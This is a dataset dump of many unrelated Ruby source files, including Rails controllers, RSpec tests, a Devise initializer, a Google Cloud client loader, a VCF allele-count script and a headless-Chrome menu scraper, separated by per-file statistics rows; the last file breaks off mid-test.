it "is accessible as a private instance method" do
IncludesMath.new.send(:asin, 0.5).should be_close(0.523598775598299, TOLERANCE)
end
end
| 33.6 | 86 | 0.6829 |
f806e142758ed70368211c100324f6dbb36594b6 | 362 | # Ubuntu Amazon EC2 AMI Finder: https://cloud-images.ubuntu.com/locator/ec2/
#
module VarsAws
  # Name used to tag the jumpbox instance.
  AWS_NAME = "bosh-jumpbox"
  # Credentials are intentionally blank; fill these in locally and never
  # commit real keys.
  AWS_ACCESS_KEY = ""
  AWS_SECRET_KEY = ""
  # EC2 key pair name and the local path to its private key (.pem).
  AWS_KEY_PEMNAME = "keypair"
  AWS_KEY_PEMPATH = "/home/$USER/keypair.pem"
  # Ubuntu AMI ID — region-specific; see the AMI locator linked above.
  AWS_UBUNTU_AMI = "ami-5189a661"
  AWS_REGION = "us-west-2"
  AWS_TYPE_INS = "t2.small"
  # Security group(s) to attach — left blank here; presumably set per deployment (TODO confirm).
  AWS_SECURITY_GROUPS = ""
end
| 25.857143 | 76 | 0.709945 |
f849513c4a632fc5f463d9f86f2b4cc3250fd39f | 907 | module RescueRegistry
module Controller
extend ActiveSupport::Concern
included do
include Context
end
def process_action(*args)
if RescueRegistry.context
# Controller logger isn't yet available
Rails.logger.warn "Didn't expect RescueRegistry context to be set in controller"
Rails.logger.debug caller.join("\n")
end
# Setting something globally is not very nice, but it allows us to access it without
# having to change a whole lot of internal Rails APIs. This especially matters when
# getting the status code via ExceptionWrapper.
# We don't unset here so that it is available to middleware
# Unsetting happens in ActionDispatch::ShowExceptions. This _should_ be ok since we shouldn't
# be processing multiple requests in the same thread.
RescueRegistry.context = self
super
end
end
end
| 32.392857 | 99 | 0.70452 |
037700e17ebd7be0579bd77b4dd01350645ab801 | 1,299 | # frozen_string_literal: true
# Load database configuration
require_relative "../../../../config/database"
require "active_brainz"
namespace :active_brainz do
namespace :models do
desc "Annotate models"
task :annotate do
require "annotate"
options = Annotate
.setup_options
.merge models: "true",
model_dir: ["lib/active_brainz/models"],
position: "after",
position_in_class: "after",
show_indexes: true,
show_foreign_keys: true,
classified_sort: "true",
require: ["active_brainz"],
trace: "true"
ARGV.clear
# Patch annotate_model's integration with ActiveSupport::Inflector
# rubocop:disable Lint/ConstantDefinitionInBlock
module AnnotateModels
def self.get_loaded_model(model_path, file)
"active_brainz/#{model_path}".camelize.constantize
rescue NameError
# Strip namespace
"active_brainz/#{model_path.gsub(%r(^[^/]*/), '')}".camelize.constantize
rescue LoadError
super
end
end
# rubocop:enable Lint/ConstantDefinitionInBlock
Annotate.eager_load(options)
AnnotateModels.do_annotations(options)
end
end
end
| 27.638298 | 82 | 0.618168 |
79d458ad78a515ff57847eac51d3d175ec157995 | 3,431 | #!/usr/bin/ruby
if __FILE__ == $0
def get_depth(entry)
if( entry == '.')
return 0
else
return entry.to_i
end
end
$:.unshift File.join(File.dirname(__FILE__),'.')
require 'vcf_line'
if(ARGV.length < 1)
puts "USAGE: add_allele_freq.rb [vcf_file] -clean\n the -clean option will remove alleles with an allele count (AC) of zero"
exit(0)
end
vcf_file = ARGV[0]
clean_alleles = (ARGV[1] == '-clean')
labels=nil
File.open(vcf_file, 'r').each_line do |line|
if(line[0,1] == '#')
if( line[0,4] == '#CHR' )
labels = line.split("\t")
puts "##INFO=<ID=AC,Number=.,Type=Integer,Description=\"Allele count in genotypes\">"
puts "##INFO=<ID=AN,Number=1,Type=Integer,Description=\"Total number of alleles in called genotypes\">"
puts "##INFO=<ID=AF,Number=.,Type=Float,Description=\"Allele frequency\">"
end
puts line
next
end
vcf_line = Vcf_line.read_line(line, false, labels)
ac = Array.new
an = 0
vcf_line.alt.each do |allele|
ac.push 0
end
if(vcf_line.sample_names.length == 0)
STDERR.puts "File #{ARGV[0]} has sites only, no samples. No output produced."
exit(1)
end
vcf_line.sample_names.each do |sample_name|
unless(vcf_line.samples[sample_name].length == 0)
# deal with sample filters
if(vcf_line.samples[sample_name][:"FT"] != nil && vcf_line.samples[sample_name][:"FT"].to_s != "PASS" && vcf_line.samples[sample_name][:"FT"].to_s != ".")
if(vcf_line.samples[sample_name][:"GT"] =~ /[1-9]/)
vcf_line.samples[sample_name][:"GT"] = "./."
elsif(vcf_line.samples[sample_name][:"FT"].to_s != "No_data") # don't list filters for non-variant genotypes (except No_data)
vcf_line.samples[sample_name][:"FT"] = '.'
end
end
geno = vcf_line.samples[sample_name][:"GT"]
if(geno =~ /([\d\.]+)[\/\\|]([\d\.]+)/)
a1 = $1
a2 = $2
if(a1 =~ /\d+/)
an += 1
if(a1 != '0')
raise "could not find allele #{a2} in sample #{sample_name} on vcf line:\n #{line}" if ac[a1.to_i-1] == nil
ac[a1.to_i-1] += 1
end
end
if(a2 =~ /\d+/)
an += 1
if(a2 != '0')
raise "could not find allele #{a2} in sample #{sample_name} on vcf line:\n #{line}" if ac[a2.to_i-1] == nil
ac[a2.to_i-1] += 1
end
end
end
end
end
if(clean_alleles)
new_ac = ac.dup
removed_alleles = 0
ac.each_with_index do |allele_count, i|
if(allele_count == 0)
vcf_line.alt.delete_at(i-removed_alleles)
new_ac.delete_at(i-removed_alleles)
removed_alleles += 1
end
if(removed_alleles > 0)
vcf_line.sample_names.each do |sample_name|
allele_index = i + 1
vcf_line.samples[sample_name][:"GT"].gsub!(allele_index.to_s, (allele_index - removed_alleles).to_s) unless vcf_line.samples[sample_name][:"GT"].nil?
end
end
end
ac = new_ac
end
mafs = Array.new
vcf_line.info[:"AC"]=ac.join(",")
vcf_line.info[:"AN"]=an
ac.each do |one_ac|
#if(one_ac.to_f/an > 0.5)
# mafs.push (1.0-one_ac.to_f/an)
#else
# mafs.push (one_ac.to_f/an)
#end
mafs.push (one_ac.to_f/an)
end
vcf_line.info[:"AF"] = mafs
if(clean_alleles && ac.length == 0)
STDERR.puts "Line #{vcf_line.chr}:#{vcf_line.pos} has no variant calls, it will be removed."
else
raise "Line #{vcf_line.chr}:#{vcf_line.pos} has no variant calls!" if ac.length == 0
puts vcf_line.print()
end
end
end
| 28.831933 | 158 | 0.617021 |
f75088df9436f5a7afa6cf0a8e76d1bb95a8c5ba | 317 | # frozen_string_literal: true
class TezosClient
module Tools
class HashToMicheline < ActiveInteraction::Base
class Contract < Base
def encode
raise "#{data} #{data.class} Not a 'String' type" unless data.is_a? ::String
{ string: data }
end
end
end
end
end
| 21.133333 | 86 | 0.618297 |
1170bac039cc36a2c2e79527f4435aeda4b6ba7c | 1,842 | # TODO(test): Test 401 on bad login, etc
RSpec.describe RegistrationsController do
let!(:user) { create :user }
def serializer
UserSerializer
end
before { @request.env["devise.mapping"] = Devise.mappings[:user] }
describe '#create' do
context 'with a valid email and password' do
it 'registers a new user' do
expect {
post :create, params: { email: '[email protected]', password: 'password123' }
}.to change(User, :count).by(1)
expect(response).to have_http_status(200)
expect(parsed_response).to eq(serialize_one(User.last))
end
end
context 'with a valid email and invalid password' do
it 'registers a new user' do
expect {
post :create, params: { email: '[email protected]', password: 'bad' }
}.not_to change(User, :count)
expect(response).to have_http_status(200)
expect(parsed_response).to eq('errors' => [
'Password is too short (minimum is 6 characters)'
])
end
end
context 'with an invalid email and valid password' do
it 'registers a new user' do
expect {
post :create, params: { email: 'bad', password: 'password123' }
}.not_to change(User, :count)
expect(response).to have_http_status(200)
expect(parsed_response).to eq('errors' => ['Email is invalid'])
end
end
context 'with an invalid email and invalid password' do
it 'registers a new user' do
expect {
post :create, params: { email: 'bad', password: 'bad' }
}.not_to change(User, :count)
expect(response).to have_http_status(200)
expect(parsed_response).to eq('errors' => [
'Email is invalid',
'Password is too short (minimum is 6 characters)'
])
end
end
end
end
| 29.238095 | 84 | 0.607492 |
1c4f96133d5babc5b45c6864efb624c95e8cd281 | 5,397 | # frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# Require this file early so that the version constant gets defined before
# requiring "google/cloud". This is because google-cloud-core will load the
# entrypoint (gem name) file, which in turn re-requires this file (hence
# causing a require cycle) unless the version constant is already defined.
require "google/cloud/policy_troubleshooter/version"
require "googleauth"
gem "google-cloud-core"
require "google/cloud" unless defined? ::Google::Cloud.new
require "google/cloud/config"
# Set the default configuration
::Google::Cloud.configure.add_config! :policy_troubleshooter do |config|
config.add_field! :endpoint, "policytroubleshooter.googleapis.com", match: ::String
config.add_field! :credentials, nil, match: [::String, ::Hash, ::Google::Auth::Credentials]
config.add_field! :scope, nil, match: [::Array, ::String]
config.add_field! :lib_name, nil, match: ::String
config.add_field! :lib_version, nil, match: ::String
config.add_field! :interceptors, nil, match: ::Array
config.add_field! :timeout, nil, match: ::Numeric
config.add_field! :metadata, nil, match: ::Hash
config.add_field! :retry_policy, nil, match: [::Hash, ::Proc]
config.add_field! :quota_project, nil, match: ::String
end
module Google
  module Cloud
    module PolicyTroubleshooter
      ##
      # Create a new client object for IamChecker.
      #
      # By default, this returns an instance of
      # [Google::Cloud::PolicyTroubleshooter::V1::IamChecker::Client](https://googleapis.dev/ruby/google-cloud-policy_troubleshooter-v1/latest/Google/Cloud/PolicyTroubleshooter/V1/IamChecker/Client.html)
      # for version V1 of the API.
      # However, you can specify a different API version by passing it in the
      # `version` parameter. If the IamChecker service is
      # supported by that API version, and the corresponding gem is available, the
      # appropriate versioned client will be returned.
      #
      # ## About IamChecker
      #
      # IAM Policy Troubleshooter service.
      #
      # This service helps you troubleshoot access issues for Google Cloud resources.
      #
      # @param version [::String, ::Symbol] The API version to connect to. Optional.
      #   Defaults to `:v1`.
      # @return [IamChecker::Client] A client object for the specified version.
      #
      def self.iam_checker version: :v1, &block
        require "google/cloud/policy_troubleshooter/#{version.to_s.downcase}"

        # Resolve the versioned sub-module (e.g. :V1) with a case- and
        # underscore-insensitive match against the requested version.
        normalized_version = version.to_s.downcase.tr "_", ""
        package_name = Google::Cloud::PolicyTroubleshooter
                       .constants
                       .find { |sym| sym.to_s.downcase == normalized_version }
        package_module = Google::Cloud::PolicyTroubleshooter.const_get package_name
        package_module.const_get(:IamChecker).const_get(:Client).new(&block)
      end

      ##
      # Configure the google-cloud-policy_troubleshooter library.
      #
      # The following configuration parameters are supported:
      #
      # * `credentials` (*type:* `String, Hash, Google::Auth::Credentials`) -
      #   The path to the keyfile as a String, the contents of the keyfile as a
      #   Hash, or a Google::Auth::Credentials object.
      # * `lib_name` (*type:* `String`) -
      #   The library name as recorded in instrumentation and logging.
      # * `lib_version` (*type:* `String`) -
      #   The library version as recorded in instrumentation and logging.
      # * `interceptors` (*type:* `Array<GRPC::ClientInterceptor>`) -
      #   An array of interceptors that are run before calls are executed.
      # * `timeout` (*type:* `Integer`) -
      #   Default timeout in milliseconds.
      # * `metadata` (*type:* `Hash{Symbol=>String}`) -
      #   Additional gRPC headers to be sent with the call.
      # * `retry_policy` (*type:* `Hash`) -
      #   The retry policy. The value is a hash with the following keys:
      #     * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
      #     * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
      #     * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
      #     * `:retry_codes` (*type:* `Array<String>`) -
      #       The error codes that should trigger a retry.
      #
      # @return [::Google::Cloud::Config] The default configuration used by this library
      #
      def self.configure
        yield ::Google::Cloud.configure.policy_troubleshooter if block_given?
        ::Google::Cloud.configure.policy_troubleshooter
      end
    end
  end
end
helper_path = ::File.join __dir__, "policy_troubleshooter", "helpers.rb"
require "google/cloud/policy_troubleshooter/helpers" if ::File.file? helper_path
| 45.737288 | 203 | 0.676672 |
d53131a365f4d054da4308ebde5a88c38c9bbd81 | 1,330 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# [START securitycenter_v1_generated_SecurityCenter_DeleteNotificationConfig_sync]
require "google/cloud/security_center/v1"

# Create a client object. The client can be reused for multiple calls.
client = Google::Cloud::SecurityCenter::V1::SecurityCenter::Client.new

# Create a request. To set request fields, pass in keyword arguments.
# NOTE(review): the real API requires the config `name` field to be set;
# this bare request is generated sample scaffolding.
request = Google::Cloud::SecurityCenter::V1::DeleteNotificationConfigRequest.new

# Call the delete_notification_config method.
result = client.delete_notification_config request

# The returned object is of type Google::Protobuf::Empty.
p result
# [END securitycenter_v1_generated_SecurityCenter_DeleteNotificationConfig_sync]
| 39.117647 | 82 | 0.797744 |
bb902767ecc4fcdbb50f361897354e1a1bd2ba96 | 374 | class ScanBuild < Formula
  desc "Clang Static Analyzer"
  homepage "http://clang-analyzer.llvm.org/scan-build.html"
  url "https://clang-analyzer.llvm.org/downloads/checker-279.tar.bz2"
  sha256 "f583b58d207e14ce6fc64a623c11d0d8001ab69ffb444b73ba638436a245c784"

  # The checker tarball ships pre-built scripts; install everything as-is.
  def install
    prefix.install Dir["*"]
  end

  # Smoke test: the scan-build driver responds to --help.
  test do
    system "#{bin}/scan-build", "--help"
  end
end
| 24.933333 | 75 | 0.735294 |
26ab04c58941a1a535e766b4bbaabfff2480a438 | 4,757 | # frozen_string_literal: true
require 'chromedriver-helper'
require 'fileutils'
require 'open-uri'
require 'watir'
require_relative '../helpers/application_helper'
require_all 'app/models'
# Contains logic to scrape a full menu
class FullMenu < Menu
  # Rendered HTML of the full printable menu (nil when scraping failed).
  attr_reader :html

  # url    - base URL of the CK menu site.
  # campus - campus name; used for the cache key and to pick the campus
  #          in the site's location tray.
  #
  # Serves the menu from the Redis cache when present; otherwise scrapes
  # the print view with headless Chrome, absolutizes relative asset links,
  # strips the site's own Bootstrap, marks dark-theme-unfriendly logos,
  # and caches the result. Any error is logged and leaves @html nil.
  def initialize(url, campus)
    type = 'Full'
    cache_key = "#{$ENVIRONMENT}_#{menu_route_builder(campus, type, nil, nil, { nil: nil })}"

    # Check cache before continuing.
    cache_value = $REDIS.get(cache_key)
    unless cache_value.nil?
      @html = cache_value
      return
    end

    menu_html_string, url_updated = scrape_menu_html(url, campus)
    scrape_file_link(menu_html_string).each do |scraped_path_array|
      menu_html_string = overwrite_file_links(scraped_path_array, url_updated, menu_html_string)
    end

    full_menu_file = Nokogiri::HTML(menu_html_string)
    menu_name = "#{type} Menu"
    update_menu_headers(full_menu_file, menu_name, campus)

    # Remove CK's version of Bootstrap so it doesn't clash with our styling.
    full_menu_file.xpath('//link/@href').each do |link|
      if link.value == "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"
        link.remove
      end
    end

    # Apply invert-logo class to logos that are not dark theme friendly.
    invert_logo_array = [
      'Pop-Up',
      'Baker & Butcher',
      'Novita'
    ]
    full_menu_file.css('.print-eatery').each do |eatery|
      title = eatery.css('h2').text
      if invert_logo_array.include?(title)
        eatery.search('.logo')[0]['class'] = 'logo invert-logo'
      end
    end

    @html = full_menu_file.inner_html

    # Cache the rendered menu for subsequent requests.
    cache(cache_key, @html)
  rescue StandardError => e
    # Watir::Wait::TimeoutError is a StandardError subclass, so the
    # original `rescue Watir::Wait::TimeoutError, StandardError` list was
    # redundant; a single StandardError rescue covers both cases.
    puts "#{$X_MARK} Error: Couldn't scrape menu from the CK website for \"#{campus}\""
    puts e.message
  end

  private

  # Replaces relative links in the original HTML with the full URL.
  # Query strings on scraped paths are dropped before prefixing.
  def overwrite_file_links(paths_array, url, menu_html_string)
    paths_array.each do |path|
      full_url_path = url + path.gsub(/\?[\S]+/, '')
      menu_html_string.gsub!(path, full_url_path)
    end
    menu_html_string
  end

  # Scrapes all links to PNGs and CSS files referenced by the menu.
  # Returns [png_paths, css_paths]: unique PNG paths that live under an
  # images directory, and unique CSS paths that are relative (no scheme).
  def scrape_file_link(menu_html_string)
    scraped_png_url_paths = []
    scraped_css_url_paths = []

    # Get strings wrapped in quotation marks, then drop the quotes.
    # (Fixes the original `scarped_strings` variable-name typo.)
    scraped_strings = menu_html_string.scan(/"[\S]+"/).map { |string| string.delete('"') }

    scraped_strings.each do |string|
      scraped_png_url_paths.push(string) if string.include?('.png')
      scraped_css_url_paths.push(string) if string.include?('.css')
    end

    [
      scraped_png_url_paths.uniq.select { |string| string.include?('images') },
      scraped_css_url_paths.uniq.reject { |string| string.include?('http') }
    ]
  end

  # Creates a headless Chrome browser instance backed by a persistent
  # tmp/chrome user-data directory.
  def new_browser
    options = Selenium::WebDriver::Chrome::Options.new

    # Make a directory for chrome if it doesn't already exist.
    chrome_dir = File.join Dir.pwd, %w(tmp chrome)
    FileUtils.mkdir_p chrome_dir
    options.add_argument "--user-data-dir=#{chrome_dir}"

    # Let Selenium know where to look for chrome if we have a hint from
    # Heroku. chromedriver-helper & chrome seem to work out of the box on
    # osx, but not on Heroku.
    chrome_bin = ENV["GOOGLE_CHROME_SHIM"]
    if chrome_bin
      options.add_argument "--no-sandbox"
      options.binary = chrome_bin
    end

    # Headless arguments.
    options.add_argument "--window-size=1200x600"
    options.add_argument "--headless"
    options.add_argument "--disable-gpu"

    Watir::Browser.new :chrome, options: options
  end

  # Scrapes the html of the menu for a particular campus.
  # Returns [menu_html_string, url_updated], where url_updated is the
  # resolved base URL without a trailing slash.
  def scrape_menu_html(url, campus)
    browser = new_browser
    browser.goto url
    raise "Couldn't reach url \"#{url}\"" if browser.html.include? 'This site can’t be reached'

    url_updated = browser.url.end_with?('/') ? browser.url.chop : browser.url

    # Select the requested campus in the location tray (JS click), then
    # load the print-friendly menu page and wait for it to render.
    campus_button = browser.div(class: 'tray').ul.li(:text => /#{campus}/).button
    campus_button.wait_until(&:present?)
    campus_button.click!

    browser.goto url_updated + '/menu/print'
    browser.div(class: 'print-eatery').wait_until(&:present?)
    menu_html_string = browser.html
    browser.close

    [
      menu_html_string,
      url_updated
    ]
  end
end
| 30.107595 | 122 | 0.692243 |
1cee94a635dddee30913df08fa8e2bcbda018f31 | 162 | class CreateUsers < ActiveRecord::Migration[5.0]
  # Creates the users table with username and password columns.
  # NOTE(review): a plain `password` string column implies passwords are
  # stored in cleartext — confirm; prefer `password_digest` with
  # has_secure_password (bcrypt).
  def change
    create_table :users do |t|
      t.string :username
      t.string :password
    end
  end
end
| 16.2 | 48 | 0.660494 |
21ce25d17c4cb6ddf933bd9b579be6e0c044fcde | 1,093 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20191010182945) do
  # Tweets authored by users; user_id references users (no FK constraint
  # or index is declared here).
  create_table "tweets", force: :cascade do |t|
    t.string "content"
    t.integer "user_id"
    t.datetime "created_at"
    t.datetime "updated_at"
  end

  # NOTE(review): password_digest suggests has_secure_password — confirm
  # against the User model. This file is auto-generated; do not hand-edit.
  create_table "users", force: :cascade do |t|
    t.string "username"
    t.string "email"
    t.string "password_digest"
  end
end
| 36.433333 | 86 | 0.752059 |
4a07d5071a403374639bffdd7c234a56e8724c0a | 344 | module Galaxy
module Invaders
Enemy = Struct.new(
:x0, :y0,
:x1, :y1,
:x2, :y2,
:x3, :y3
) do
def area
@area ||=
[
Vector2.new(x0, y0),
Vector2.new(x1, y1),
Vector2.new(x2, y2),
Vector2.new(x3, y3)
]
end
end
end
end
| 16.380952 | 32 | 0.398256 |
d5b122adbb73e109601b9e36dc19989663ac318d | 12,753 | # Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
  # Sender address used by Devise mailers (confirmation instructions,
  # password reset, unlock instructions).
  config.mailer_sender = '[email protected]'

  # Back Devise models with ActiveRecord.
  require 'devise/orm/active_record'

  # Treat the e-mail key case-insensitively and strip surrounding
  # whitespace before lookup or persistence.
  config.case_insensitive_keys = [ :email ]
  config.strip_whitespace_keys = [ :email ]

  # Never store HTTP Basic auth credentials in the session.
  config.skip_session_storage = [:http_auth]

  # bcrypt cost factor. A single stretch in the test environment keeps
  # the suite fast; 10 is the recommended minimum elsewhere.
  config.stretches = Rails.env.test? ? 1 : 10

  # E-mail address changes must be re-confirmed: the new address is held
  # in unconfirmed_email until the confirmation link is visited.
  config.reconfirmable = true

  # Invalidate every remember-me token when the user signs out.
  config.expire_all_remember_me_on_sign_out = true

  # Accepted password length range.
  config.password_length = 8..128

  # Reset-password tokens expire after this interval.
  config.reset_password_within = 6.hours

  # Sign out via HTTP DELETE (the Devise default for Rails apps).
  config.sign_out_via = :delete

  # All other Devise options are left at their defaults. See the stock
  # initializer produced by `rails generate devise:install` for the full
  # catalogue of commented-out settings (lockable, timeoutable, omniauth,
  # warden hooks, mountable-engine options, etc.).
end
| 49.05 | 154 | 0.750333 |
085386e43e022a35efe2bfd39002e9cf2669bde5 | 785 | # frozen_string_literal: true
# Configure Rails Environment
ENV['RAILS_ENV'] = 'test'

require 'webmock/rspec'

# Run Coverage report
require 'solidus_dev_support/rspec/coverage'

# Boot the dummy Rails app that hosts the extension under test.
require File.expand_path('dummy/config/environment.rb', __dir__)

# Requires factories and other useful helpers defined in spree_core.
require 'solidus_dev_support/rspec/feature_helper'

# Requires supporting ruby files with custom matchers and macros, etc,
# in spec/support/ and its subdirectories.
Dir[File.join(File.dirname(__FILE__), 'support/**/*.rb')].each { |f| require f }

# Requires factories defined in lib/solidus_klarna/factories.rb
require 'solidus_klarna/factories'

RSpec.configure do |config|
  config.infer_spec_type_from_file_location!
  # NOTE(review): transactional fixtures disabled — presumably a
  # DatabaseCleaner-style strategy is configured in spec/support; confirm.
  config.use_transactional_fixtures = false
end
| 29.074074 | 80 | 0.794904 |
11413cabf5a8c28e491765953607a3fac54bc281 | 6,172 | # frozen_string_literal: true
require "rails_helper"
# This spec was generated by rspec-rails when you ran the scaffold generator.
# It demonstrates how one might use RSpec to test the controller code that
# was generated by Rails when you ran the scaffold generator.
#
# It assumes that the implementation code is generated by the rails scaffold
# generator. If you are using any extension libraries to generate different
# controller code, this generated spec may or may not pass.
#
# It only uses APIs available in rails and/or rspec-rails. There are a number
# of tools you can use to make these specs even more expressive, but we're
# sticking to rails and rspec-rails APIs to keep things simple and stable.
# Request specs for /event_attendees covering index/show/new/edit/create/
# update/destroy for three access levels: signed-out, wrong user, and the
# user owning the attendee's profile. Shared examples "redirect to sign in"
# and "unauthorized access" are defined elsewhere in spec/support.
RSpec.describe "/event_attendees", type: :request do
  let(:event_attendee) { create :event_attendee }
  # user defaults to nil so that, absent an override, requests run signed out.
  let(:user) { nil }

  before(:each) do
    sign_in user if user
  end

  describe "GET /index" do
    subject(:get_index) { get event_attendees_url }

    context "when user is logged in" do
      # NOTE(review): this let! shadows the outer singular `event_attendee`
      # with a two-element list — index [0] belongs to the signed-in user,
      # [1] to someone else. A plural name would be clearer.
      let!(:event_attendee) { create_list :event_attendee, 2 }
      let(:user) { event_attendee[0].profile.user }

      it "renders a successful response" do
        get_index
        expect(response.body).to include(event_attendee[0].profile_id.to_s)
      end

      it "don't render other users records" do
        get_index
        expect(response.body).not_to include(event_attendee[1].profile_id.to_s)
      end
    end
  end

  describe "GET /show" do
    subject(:get_show) { get event_attendee_url(event_attendee) }

    it "renders a successful response" do
      get_show
      expect(response).to be_successful
    end
  end

  describe "GET /new" do
    subject(:get_new) { get new_event_attendee_url }

    include_examples "redirect to sign in"

    context "when user is logged in" do
      let(:user) { create :user }

      it "renders a successful response" do
        get_new
        expect(response).to be_successful
      end
    end
  end

  describe "GET /edit" do
    subject(:get_edit) { get edit_event_attendee_url(event_attendee) }

    include_examples "redirect to sign in"

    context "when user does not match profile" do
      let(:user) { create :user }

      include_examples "unauthorized access"
    end

    context "when user matches profile" do
      let(:user) { event_attendee.profile.user }

      it "render a successful response" do
        get_edit
        expect(response).to be_successful
      end
    end
  end

  describe "POST /create" do
    subject(:post_create) { post event_attendees_url, params: { event_attendee: attributes } }

    context "with valid parameters" do
      let(:profile) { create(:profile) }
      let(:attributes) do
        {
          profile_id: profile.id,
          event_id: create(:event).id
        }
      end

      include_examples "redirect to sign in"

      context "when user does not match profile" do
        let(:user) { create :user }

        include_examples "unauthorized access"
      end

      context "when user matches profile" do
        let(:user) { profile.user }

        it "creates a new EventAttendee" do
          expect { post_create }.to change(EventAttendee, :count).by(1)
        end

        it "redirects to the created event_attendee" do
          post_create
          expect(response).to redirect_to(event_attendee_url(EventAttendee.last))
        end
      end
    end

    context "with invalid parameters and valid user" do
      # Invalid because event_id is omitted entirely.
      let(:attributes) { { profile_id: profile.id } }
      let(:profile) { create(:profile) }
      let(:user) { profile.user }

      it "does not create a new EventAttendee" do
        expect { post_create }.to change(EventAttendee, :count).by(0)
      end

      it "returns an unprocessable entity code" do
        post_create
        expect(response.status).to eq(422)
      end
    end
  end

  describe "PATCH /update" do
    subject(:patch_update) { patch event_attendee_url(event_attendee), params: { event_attendee: attributes } }

    let(:event_attendee) { create :event_attendee }

    context "with valid parameters" do
      let(:attributes) do
        { event_id: create(:event, name: "StrangeLoop").id }
      end

      include_examples "redirect to sign in"

      context "when user does not match profile" do
        let(:user) { create :user }

        include_examples "unauthorized access"
      end

      context "when user matches profile" do
        let(:user) { event_attendee.profile.user }

        it "updates the requested event_attendee" do
          patch_update
          event_attendee.reload
          expect(event_attendee.event.name).to eq "StrangeLoop"
        end

        it "redirects to the event_attendee" do
          patch_update
          expect(response).to redirect_to(event_attendee_url(event_attendee))
        end
      end
    end

    context "with invalid parameters and valid user" do
      let(:attributes) { { event_id: nil } }
      let(:user) { event_attendee.profile.user }

      it "returns an unprocessable entity code" do
        patch_update
        expect(response.status).to eq(422)
      end

      # NOTE(review): "RubyConf" is presumably the factory default event
      # name — this asserts the name was NOT changed by the failed update.
      it "updates the event name" do
        patch_update
        expect(event_attendee.reload.event.name).to eq "RubyConf"
      end
    end
  end

  describe "DELETE /destroy" do
    subject(:delete_destroy) { delete event_attendee_url(event_attendee) }

    let!(:event_attendee) { create :event_attendee }

    include_examples "redirect to sign in"

    context "when unrelated user" do
      let(:user) { create :user }

      include_examples "unauthorized access"

      it "does not allow folks to delete others event attendance" do
        delete_destroy
        expect(event_attendee.id).to eq event_attendee.reload.id
      end
    end

    context "when user matches profile" do
      let(:user) { event_attendee.profile.user }

      it "destroys the requested event_attendee" do
        expect { delete_destroy }.to change(EventAttendee, :count).by(-1)
      end

      it "redirects to the event_attendees list" do
        delete_destroy
        expect(response).to redirect_to(event_attendees_url)
      end
    end
  end
end
| 27.801802 | 111 | 0.66267 |
286ea850af164094d50e20da9f3226a8eb6b08a5 | 424 | # frozen_string_literal: true
module Settings
  # Lets the current user view and remove their own muted users.
  class MutedUsersController < ApplicationV6Controller
    before_action :authenticate_user!

    # GET: the signed-in user's mutes, newest first.
    def index
      @mute_users = current_user.mute_users.order(id: :desc)
    end

    # DELETE: unmute. Scoped through current_user.mute_users, so a user
    # cannot remove another user's mute (find raises RecordNotFound).
    # The notice is Japanese for "Mute removed".
    def destroy
      mute_user = current_user.mute_users.find(params[:mute_user_id])
      mute_user.destroy
      redirect_to settings_muted_user_list_path, notice: "ミュートを解除しました"
    end
  end
end
| 23.555556 | 70 | 0.745283 |
ab6a7ef015ee0b12939832afcde5c4132e344758 | 9,828 | require "integration_test_helper"
# Integration tests for the Welsh-language bank holidays page.
class GwyliauBancTest < ActionDispatch::IntegrationTest
  setup do
    # Both locales must exist in the content store: the Welsh item is under
    # test and the English item backs the equivalent /bank-holidays route.
    content_item_cy = {
      base_path: "/gwyliau-banc",
      schema_name: "calendar",
      document_type: "calendar",
      locale: "cy",
    }
    stub_content_store_has_item("/gwyliau-banc", content_item_cy)
    content_item_en = {
      base_path: "/bank-holidays",
      schema_name: "calendar",
      document_type: "calendar",
    }
    stub_content_store_has_item("/bank-holidays", content_item_en)
  end

  # FIX: the first test below calls Timecop.travel WITHOUT a block, which
  # leaves the clock frozen after that test finishes and can bleed into
  # every later test in the process. Always restore real time.
  teardown do
    Timecop.return
  end

  should "display the Gwyliau Banc page" do
    Timecop.travel("2012-12-14")
    visit "/gwyliau-banc"
    within("head", visible: false) do
      assert page.has_selector?("title", text: "Gwyliau banc y DU - GOV.UK", visible: false)
      desc = page.find("meta[name=description]", visible: false)
      assert_equal "Dysgwch pryd mae gwyliau'r banc yng Nghymru, Lloegr, yr Alban a Gogledd Iwerddon - gan gynnwys gwyliau banc yn y gorffennol a'r dyfodol", desc["content"]
      assert page.has_selector?("link[rel=alternate][type='application/json'][href='/gwyliau-banc.json']", visible: false)
      assert page.has_selector?("link[rel=alternate][type='application/json'][href='/gwyliau-banc/cymru-a-lloegr.json']", visible: false)
      assert page.has_selector?("link[rel=alternate][type='text/calendar'][href='/gwyliau-banc/cymru-a-lloegr.ics']", visible: false)
      assert page.has_selector?("link[rel=alternate][type='application/json'][href='/gwyliau-banc/yr-alban.json']", visible: false)
